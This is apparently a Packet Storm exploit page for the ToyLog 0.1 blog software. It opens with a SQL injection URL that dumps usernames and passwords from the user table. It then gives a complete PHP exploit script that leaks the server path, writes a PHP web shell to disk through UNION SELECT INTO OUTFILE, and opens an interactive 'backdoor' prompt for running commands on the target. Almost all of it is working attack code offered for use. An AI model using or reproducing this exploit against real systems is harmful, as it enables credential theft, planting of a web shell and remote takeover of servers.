ToyLog version 0.1 remote SQL injection and command execution exploit.
55523e991afbbbdf369376cec07196c899c0ea0a96b4135234103551debccb8c--+++=====================================================================================+++--
--+++====== ToyLog 0.1 SQL Injection Vulnerability/Remote Command Execution Exploit ======+++--
--+++=====================================================================================+++--
[+] SQL Injection Vulnerability
Url: http://localhost/ToyLog/read.php?idm=1%20UNION%20ALL%20SELECT%201,username,password,4%20FROM%20user
[+] Remote Command Execution Exploit
#!/usr/bin/php
<?php
function usage () {
exit ( "\n".
"+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n".
"- -\n".
"+ ToyLog 0.1 Remote Command Execution Exploit +\n".
"- Author : darkjoker -\n".
"+ Site : http://darkjoker.net23.net +\n".
"- Download: http://sourceforge.net/projects/toylog/ -\n".
"+ Usage : php xpl.php <url> +\n".
"- Ex. : php xpl.php http://localhost/ToyLog/ -\n".
"+ +\n".
"-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-\n".
"\n");
}
function hex_format ($string) {
$i=0;
while ($i<strlen($string))
$hex .= "%".dechex(ord($string[$i++]));
return $hex;
}
function get_path ($host, $dir) {
$fp = fsockopen ($host, 80);
$query = hex_format ("1 UNION ALL SELECT * FROM does_not_exist");
$req = "GET {$dir}read.php?idm={$query} HTTP/1.1\r\n".
"Host: {$host}\r\n".
"Connection: Close\r\n\r\n";
fputs ($fp, $req);
while (!feof ($fp))
if (preg_match ("|resource in <b>(.+?)</b> on|", fgets ($fp, 1024), $data))
$path = $data [1];
list ($path) = explode ("block/db.php", $path);
fclose ($fp);
return $path;
}
function upload_shell ($host, $dir) {
$fp = fsockopen ($host, 80);
$shell_path = get_path ($host, $dir)."shell.php";
if (!strcmp ($shell_path, "shell.php"))
die ("[-] Exploit failed.\n");
$query = hex_format('1 UNION ALL SELECT 1,2,\'xxx<?php system (stripslashes($_GET[\\\'cmd\\\'])); ?>xxx\',4 INTO OUTFILE \''.$shell_path.'\' FROM post');
$req = "GET {$dir}read.php?idm={$query} HTTP/1.1\r\n".
"Host: {$host}\r\n".
"Connection: Close\r\n\r\n";
fputs ($fp, $req);
fclose ($fp);
}
if (!preg_match ("|http://(.+?)(/.+/)|", $argv [1], $data))
usage ();
array_shift ($data);
list ($host, $dir) = $data;
upload_shell ($host, $dir);
$stdin = fopen ("php://stdin", "r");
while (1) {
echo "backdoor@{$host}: ";
$cmd = hex_format(trim (fgets ($stdin, 1024)));
if (!strcmp ($cmd, hex_format("exit")))
break;
$out = explode ("xxx", file_get_contents ("http://{$host}{$dir}shell.php?cmd={$cmd}"));
array_shift ($out);
array_pop ($out);
echo $out [0];
}
?>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed